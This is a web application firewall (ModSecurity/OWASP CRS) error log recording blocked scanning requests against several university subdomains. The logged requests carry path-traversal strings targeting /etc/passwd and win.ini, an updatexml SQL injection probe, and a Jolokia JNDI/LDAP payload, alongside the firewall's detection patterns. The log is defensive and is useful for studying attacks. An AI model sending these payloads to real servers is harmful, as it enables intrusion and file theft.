[Tue Aug 29 11:45:02.441935 2023] [:error] [pid 2143] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:page: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zsCo-f0AAAhfdnsAAAAa"]
[Tue Aug 29 11:45:02.443477 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:view: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zsCo-f0AAAhtjbkAAAAq"]
[Tue Aug 29 11:45:02.444380 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:view: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zsCo-f0AAAfGahAAAAAT"]
[Tue Aug 29 11:45:03.370837 2023] [:error] [pid 2162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:view: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13z8Co-f0AAAhyKWEAAAAw"]
[Tue Aug 29 11:45:03.393638 2023] [:error] [pid 2016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....// found within ARGS:page: ....//....//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13z8Co-f0AAAfg76gAAAAe"]
[Tue Aug 29 11:45:03.399972 2023] [:error] [pid 2104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:page: windows/win.ini\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13z8Co-f0AAAg4DecAAAAI"]
[Tue Aug 29 11:45:04.386329 2023] [:error] [pid 2104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:page: etc/passwd\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO130MCo-f0AAAg4DekAAAAI"]
[Tue Aug 29 11:45:04.425503 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:page: ../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO130MCo-f0AAAdxUkAAAAAC"]
[Tue Aug 29 11:45:05.353126 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....// found within ARGS:page: ....//....//windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO130cCo-f0AAAdOehUAAAAS"]
[Tue Aug 29 11:45:05.358895 2023] [:error] [pid 2011] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:student_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:student_id: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/TransferredOutModal.php"] [unique_id "ZO130cCo-f0AAAfbkvUAAAAZ"]
[Tue Aug 29 11:45:05.360720 2023] [:error] [pid 2016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:student_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:student_id: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/TransferredOutModal.php"] [unique_id "ZO130cCo-f0AAAfg76sAAAAe"]
[Tue Aug 29 11:45:05.366415 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:student_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:student_id: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/TransferredOutModal.php"] [unique_id "ZO130cCo-f0AAAfiYtQAAAAg"]
[Tue Aug 29 11:45:05.379136 2023] [:error] [pid 2111] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO130cCo-f0AAAg-pNYAAAAR"]
[Tue Aug 29 11:45:05.379570 2023] [:error] [pid 2011] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO130cCo-f0AAAfbkvYAAAAZ"]
[Tue Aug 29 11:45:05.380387 2023] [:error] [pid 2107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO130cCo-f0AAAg7zHIAAAAJ"]
[Tue Aug 29 11:45:05.382247 2023] [:error] [pid 2170] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO130cCo-f0AAAh6rJYAAAA4"]
[Tue Aug 29 11:45:05.395399 2023] [:error] [pid 2160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:page: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO130cCo-f0AAAhwxlgAAAAt"]
[Tue Aug 29 11:45:05.395958 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO130cCo-f0AAAhlz3kAAAAi"]
[Tue Aug 29 11:45:06.363822 2023] [:error] [pid 2170] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:{\\r\\n   "type":"read",\\r\\n   "mbean":"java.lang:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22,\\x0d\\x0a   \\x22 found within ARGS:{\\x5cr\\x5cn   \\x22type\\x22:\\x22read\\x22,\\x5cr\\x5cn   \\x22mbean\\x22:\\x22java.lang:type: Memory\\x22,\\x0d\\x0a   \\x22target\\x22:{\\x0d\\x0a      \\x22url\\x22:\\x22service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat\\x22\\x0d\\x0a   }\\x0d\\x0a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/jolokia/read/getDiagnosticOptions"] [unique_id "ZO130sCo-f0AAAh6rJcAAAA4"]
[Tue Aug 29 11:45:06.365509 2023] [:error] [pid 2171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:{\\r\\n   "type":"read",\\r\\n   "mbean":"java.lang:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22,\\x0d\\x0a   \\x22 found within ARGS:{\\x5cr\\x5cn   \\x22type\\x22:\\x22read\\x22,\\x5cr\\x5cn   \\x22mbean\\x22:\\x22java.lang:type: Memory\\x22,\\x0d\\x0a   \\x22target\\x22:{\\x0d\\x0a      \\x22url\\x22:\\x22service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat\\x22\\x0d\\x0a   }\\x0d\\x0a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/jolokia/read/getDiagnosticOptions"] [unique_id "ZO130sCo-f0AAAh7wsMAAAA5"]
[Tue Aug 29 11:45:06.365650 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:{\\r\\n   "type":"read",\\r\\n   "mbean":"java.lang:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22,\\x0d\\x0a   \\x22 found within ARGS:{\\x5cr\\x5cn   \\x22type\\x22:\\x22read\\x22,\\x5cr\\x5cn   \\x22mbean\\x22:\\x22java.lang:type: Memory\\x22,\\x0d\\x0a   \\x22target\\x22:{\\x0d\\x0a      \\x22url\\x22:\\x22service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat\\x22\\x0d\\x0a   }\\x0d\\x0a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/jolokia/read/getDiagnosticOptions"] [unique_id "ZO130sCo-f0AAAfGahYAAAAT"]
[Tue Aug 29 11:45:06.375223 2023] [:error] [pid 2156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:student_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:student_id: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/TransferredOutModal.php"] [unique_id "ZO130sCo-f0AAAhsnhAAAAAp"]
[Tue Aug 29 11:45:06.376081 2023] [:error] [pid 2016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:{\\r\\n   "type":"read",\\r\\n   "mbean":"java.lang:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22,\\x0d\\x0a   \\x22 found within ARGS:{\\x5cr\\x5cn   \\x22type\\x22:\\x22read\\x22,\\x5cr\\x5cn   \\x22mbean\\x22:\\x22java.lang:type: Memory\\x22,\\x0d\\x0a   \\x22target\\x22:{\\x0d\\x0a      \\x22url\\x22:\\x22service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat\\x22\\x0d\\x0a   }\\x0d\\x0a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/jolokia/read/getDiagnosticOptions"] [unique_id "ZO130sCo-f0AAAfg760AAAAe"]
[Tue Aug 29 11:45:06.392105 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:{\\r\\n   "type":"read",\\r\\n   "mbean":"java.lang:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22,\\x0d\\x0a   \\x22 found within ARGS:{\\x5cr\\x5cn   \\x22type\\x22:\\x22read\\x22,\\x5cr\\x5cn   \\x22mbean\\x22:\\x22java.lang:type: Memory\\x22,\\x0d\\x0a   \\x22target\\x22:{\\x0d\\x0a      \\x22url\\x22:\\x22service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat\\x22\\x0d\\x0a   }\\x0d\\x0a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/jolokia/read/getDiagnosticOptions"] [unique_id "ZO130sCo-f0AAARphJ4AAAAU"]
[Tue Aug 29 11:45:06.401469 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....// found within ARGS:page: ....//....//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO130sCo-f0AAAe3@JUAAAAA"]
[Tue Aug 29 11:45:06.403862 2023] [:error] [pid 2111] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:student_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:student_id: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/TransferredOutModal.php"] [unique_id "ZO130sCo-f0AAAg-pNkAAAAR"]
[Tue Aug 29 11:45:06.411930 2023] [:error] [pid 2029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO130sCo-f0AAAftVIoAAAAf"]
[Tue Aug 29 11:45:07.367819 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:patron_only_image. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:patron_only_image: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO1308Co-f0AAAdOehkAAAAS"]
[Tue Aug 29 11:45:07.373534 2023] [:error] [pid 2159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:{\\r\\n   "type":"read",\\r\\n   "mbean":"java.lang:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22,\\x0d\\x0a   \\x22 found within ARGS:{\\x5cr\\x5cn   \\x22type\\x22:\\x22read\\x22,\\x5cr\\x5cn   \\x22mbean\\x22:\\x22java.lang:type: Memory\\x22,\\x0d\\x0a   \\x22target\\x22:{\\x0d\\x0a      \\x22url\\x22:\\x22service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat\\x22\\x0d\\x0a   }\\x0d\\x0a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/jolokia/read/getDiagnosticOptions"] [unique_id "ZO1308Co-f0AAAhvjVUAAAAs"]
[Tue Aug 29 11:45:07.392264 2023] [:error] [pid 2029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:patron_only_image. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:patron_only_image: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO1308Co-f0AAAftVIsAAAAf"]
[Tue Aug 29 11:45:07.394997 2023] [:error] [pid 2159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:patron_only_image. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:patron_only_image: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO1308Co-f0AAAhvjVYAAAAs"]
[Tue Aug 29 11:45:07.427231 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:patron_only_image. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:patron_only_image: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO1308Co-f0AAAe3@JgAAAAA"]
[Tue Aug 29 11:45:07.447714 2023] [:error] [pid 2124] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:patron_only_image. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:patron_only_image: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO1308Co-f0AAAhMtWAAAAAM"]
[Tue Aug 29 11:45:08.365205 2023] [:error] [pid 2144] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:student_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:student_id: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/TransferredOutModal.php"] [unique_id "ZO131MCo-f0AAAhgoGIAAAAb"]
